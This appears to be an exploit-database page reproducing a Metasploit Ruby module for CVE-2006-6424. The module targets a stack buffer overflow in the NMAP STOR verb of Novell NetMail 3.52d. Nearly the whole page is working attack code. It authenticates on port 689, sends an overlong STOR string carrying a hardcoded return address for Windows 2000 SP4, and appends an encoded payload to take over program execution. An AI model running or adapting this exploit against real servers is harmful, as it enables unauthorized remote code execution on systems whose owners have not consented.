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Novell NetMail <= 3.52d NMAP STOR Buffer Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
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Stack buffer overflow in Novell's Netmail 3.52 NMAP STOR verb allows attacker to control program executio

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                                                ##
# $Id: nmap_stor.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require &#39;msf/core&#39;

class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =&#62; &#39;Novell NetMail &#60;= 3.52d NMAP STOR Buffer Overflow&#39;,
			&#39;Description&#39;    =&#62; %q{
					This module exploits a stack buffer overflow in Novell&#39;s Netmail 3.52 NMAP STOR
				verb. By sending an overly long string, an attacker can overwrite the
				buffer and control program execution.
			},
			&#39;Author&#39;         =&#62; [ &#39;MC&#39; ],
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Version&#39;        =&#62; &#39;$Revision: 9262 $&#39;,
			&#39;References&#39;     =&#62;
				[
					[ &#39;CVE&#39;, &#39;2006-6424&#39; ],
					[ &#39;OSVDB&#39;, &#39;31363&#39; ],
					[ &#39;BID&#39;, &#39;21725&#39; ],
				],
			&#39;Privileged&#39;     =&#62; true,
			&#39;DefaultOptions&#39; =&#62;
				{
					&#39;EXITFUNC&#39; =&#62; &#39;thread&#39;,
				},
			&#39;Payload&#39;        =&#62;
				{
					&#39;Space&#39;    =&#62; 500,
					&#39;BadChars&#39; =&#62; &#34;\x00\x0a\x0d\x20&#34;,
					&#39;StackAdjustment&#39; =&#62; -3500,
				},
			&#39;Platform&#39;       =&#62; &#39;win&#39;,
			&#39;Targets&#39;        =&#62;
				[
					[&#39;Windows 2000 Pro SP4 English&#39;,   { &#39;Ret&#39; =&#62; 0x7cdc97fb }],
				],
			&#39;DefaultTarget&#39;  =&#62; 0,
			&#39;DisclosureDate&#39; =&#62; &#39;Dec 23 2006&#39;))

		register_options([Opt::RPORT(689)], self.class)
	end

	def exploit
		connect
		sock.get_once

		auth =  &#34;USER &#34; + rand_text_english(10)
		sock.put(auth + &#34;\r\n&#34;)

		res = sock.get_once

		sploit =  &#34;STOR &#34; + rand_text_english(253) + [ target.ret ].pack(&#39;V&#39;)
		sploit &#60;&#60; &#34; &#34; + rand_text_english(20) + &#34;\r\n&#34; + payload.encoded

		if (res =~ /1000/)
			print_status(&#34;Trying target #{target.name}...&#34;)
			sock.put(sploit)
		else
			print_status(&#34;Not in Trusted Hosts.&#34;)
		end

		handler
		disconnect
	end
end

                              

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